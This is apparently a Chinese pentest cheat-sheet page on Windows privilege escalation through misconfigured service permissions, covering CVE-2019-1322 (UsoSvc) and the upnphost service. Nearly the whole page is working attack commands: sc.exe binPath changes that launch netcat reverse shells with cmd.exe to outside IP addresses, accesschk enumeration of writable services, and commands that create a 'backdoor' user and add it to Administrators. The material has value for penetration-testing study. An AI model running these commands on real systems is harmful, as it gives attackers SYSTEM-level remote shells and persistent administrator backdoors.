服务中的不正确权限
CVE-2019-1322 UsoSvc
条件:服务帐号
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
upnphost
>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
>sc config upnphost obj= ".\LocalSystem" password= ""
>sc qc upnphost
>sc config upnphost depend= ""
>net start upnphost
如果由于缺少依赖项而失败,请尝试以下命令。
>sc config SSDPSRV start=auto
>net start SSDPSRV
>net stop upnphost
>net start upnphost
>
>sc config upnphost depend=""
使用accesschk
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe
>accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
>accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
>sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
>sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
>sc stop <vuln-service>
>sc start <vuln-service>
>sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
>sc stop <vuln-service>
>sc start <vuln-service>
最后更新于